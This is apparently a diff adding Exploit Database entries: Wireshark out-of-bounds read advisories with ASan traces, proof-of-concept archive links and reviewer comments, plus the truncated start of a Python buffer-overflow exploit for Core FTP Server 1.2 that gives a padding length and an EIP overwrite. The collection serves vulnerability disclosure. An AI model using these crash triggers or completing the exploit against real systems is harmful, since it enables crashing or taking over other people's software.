+=>0x0feedb623c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
+ 0x0feedb623c10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
+ 0x0feedb623c20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
+ 0x0feedb623c30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
+ 0x0feedb623c40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
+ 0x0feedb623c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==5092==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39482.zip
+
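Review bot: The affected code is identified only as "current git master", with no commit hash or release number, and the text links bug 11825 without naming a fixed version, so a reader cannot tell whether an installed Wireshark is affected. The proof-of-concept archive is referenced by URL alone; a line such as `SHA-256: <digest of 39482.zip>` would let the download be verified before it is opened in an analysis environment. In the ASAN report the read lands 0 bytes past `nm_att_tlvdef_base` (size 2040) at `packet-gsm_abis_oml.c:1544`, which is consistent with an attribute index that is not bounds-checked against the table, though the dissector source is not shown here. The same missing version and digest apply to 39483.txt, whose hunk continues past the end of this view.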
diff --git a/platforms/multiple/dos/39483.txt b/platforms/multiple/dos/39483.txt
new file mode 100755
index 000000000..8c073868c
--- /dev/null
+++ b/platforms/multiple/dos/39483.txt
@@ -0,0 +1,74 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=654
+
+The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==32475==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198
+READ of size 4 at 0x7fd688698b10 thread T0
+ #0 0x7fd68535131f in add_ff_vht_compressed_beamforming_report wireshark/epan/dissectors/packet-ieee80211.c:9143:8
+ #1 0x7fd68534746f in add_ff_action_vht wireshark/epan/dissectors/packet-ieee80211.c:9199:16
+ #2 0x7fd68533f813 in add_ff_action wireshark/epan/dissectors/packet-ieee80211.c:9426:12
+ #3 0x7fd685324811 in add_fixed_field wireshark/epan/dissectors/packet-ieee80211.c:9566:14
+ #4 0x7fd68536ebae in dissect_ieee80211_mgt wireshark/epan/dissectors/packet-ieee80211.c:16388:17
+ #5 0x7fd685368cce in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:18218:7
+ #6 0x7fd685338dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
+ #7 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #8 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #9 0x7fd6842b9dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #10 0x7fd684fc95f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #11 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #12 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #13 0x7fd6842c42be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #14 0x7fd6842b5ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #15 0x7fd6842b533b in dissect_record wireshark/epan/packet.c:501:3
+ #16 0x7fd6842633c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+ #17 0x5264eb in process_packet wireshark/tshark.c:3728:5
+ #18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
+ #19 0x515daf in main wireshark/tshark.c:2197:13
+
+0x7fd688698b10 is located 48 bytes to the left of global variable '' defined in 'packet-ieee80211.c:9115:70' (0x7fd688698b40) of size 30
+ '' is ascii string 'Average Signal to Noise Ratio'
+0x7fd688698b10 is located 0 bytes to the right of global variable 'ns_arr' defined in 'packet-ieee80211.c:9091:20' (0x7fd688698ae0) of size 48
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ieee80211.c:9143:8 in add_ff_vht_compressed_beamforming_report
+Shadow bytes around the buggy address:
+ 0x0ffb510cb110: f9 f9 f9 f9 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
+ 0x0ffb510cb120: 00 00 00 07 f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9
+ 0x0ffb510cb130: 00 00 06 f9 f9 f9 f9 f9 00 00 00 00 00 03 f9 f9
+ 0x0ffb510cb140: f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
+ 0x0ffb510cb150: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
+=>0x0ffb510cb160: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9
+ 0x0ffb510cb170: 00 00 00 05 f9 f9 f9 f9 00 00 00 00 00 00 00 01
+ 0x0ffb510cb180: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 03 f9
+ 0x0ffb510cb190: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 00
+ 0x0ffb510cb1a0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
+ 0x0ffb510cb1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==32475==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11818. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39483.zip
+
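Review bot: The advisory records neither the affected Wireshark revision nor a checksum for the linked archive: the opening paragraph says only "current git master", and the `Proof of Concept:` line points at a raw GitHub zip. Someone triaging this entry later cannot tell which builds are affected, or confirm that the archive they fetch is the sample that was filed upstream. I would add two lines after the bug reference, `Affected: Wireshark git master at time of report (<commit-hash>); fix status: see Wireshark bug 11818` and `SHA-256 (39483.zip): <sha256-of-archive>`, with the placeholders filled in from the upstream report. The 39484.txt hunk below has the same gaps, with bug 11796 and 39484.zip.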
diff --git a/platforms/multiple/dos/39484.txt b/platforms/multiple/dos/39484.txt
new file mode 100755
index 000000000..e1e9ca57c
--- /dev/null
+++ b/platforms/multiple/dos/39484.txt
@@ -0,0 +1,141 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=648
+
+The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
+READ of size 8 at 0x000005676c18 thread T0
+ #0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
+ #1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
+ #2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
+ #3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
+ #4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
+ #5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
+ #6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
+ #7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
+ #8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
+ #9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
+ #10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
+ #11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
+ #12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
+ #13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
+ #14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
+ #15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
+ #16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
+ #17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
+ #18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
+ #19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
+ #24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
+ #25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
+ #29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
+ #30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
+ #31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
+ #32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
+ #33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
+ #37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
+ #38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
+ #39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
+ #44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
+ #45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
+ #46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
+ #47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
+ #48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
+ #49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
+ #53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
+ #54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
+ #55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
+ #56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
+ #57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
+ #58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
+ #62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
+ #63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
+ #67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
+ #68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
+ #73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
+ #74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
+ #83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+ #84 0x53c91b in process_packet wireshark/tshark.c:3728:5
+ #85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
+ #86 0x52c1df in main wireshark/tshark.c:2197:13
+
+0x000005676c18 is located 8 bytes to the left of global variable '' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
+ '' is ascii string 'queryWithPerm '
+0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
+Shadow bytes around the buggy address:
+ 0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
+ 0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
+ 0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
+ 0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
+ 0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
+=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
+ 0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
+ 0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
+ 0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
+ 0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
+ 0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==7855==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39484.zip
+
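Review bot: The write-up never says which object is overread, so the reader has to dig it out of an 87-frame trace. The SUMMARY line names `dissect_ber_set` at packet-ber.c:2588, but the ASan detail places the faulting address 24 bytes to the right of `T_paramSet_set` (size 32, defined at ansi_tcap.cnf:183). That suggests the walk over the set table ran past its last entry, though the table definition is not visible here, so triage should cover the table in the ansi_tcap conformance file as well as the generic BER loop. A one-line summary after the trace would make this explicit, e.g. `Overread object: T_paramSet_set (32 bytes, ansi_tcap.cnf:183); faulting read in dissect_ber_set, packet-ber.c:2588`.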
diff --git a/platforms/windows/local/39480.py b/platforms/windows/local/39480.py
new file mode 100755
index 000000000..c9330a848
--- /dev/null
+++ b/platforms/windows/local/39480.py
@@ -0,0 +1,77 @@
+#-*- coding: utf-8 -*-
+#
+# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
+# Date: 2016-02-22
+# Author: INSECT.B
+# Facebook : https://www.facebook.com/B.INSECT00
+# GitHub : binsect00
+# Blog : http://binsect00.tistory.com
+# Vendor Homepage : http://www.coreftp.com/
+# Software Link:
+# Version: 1.2
+# Tested on: Windows7 Professional SP1 En x86
+# CVE : N/A
+
+'''
+[+] Type : Buffer overflow
+[+] Detail :
+[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
+[-] Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More]
+[-] 'Log filename(include path)' field is no limit to the length and does not check the length
+[-] Insert string "A"*1500 and press Ok, OK
+[-] crash info
+(3bc.e28): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
+eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
+41414141 ?? ???
+'''
+import struct
+
+junk = "A" * 312
+EIP = struct.pack("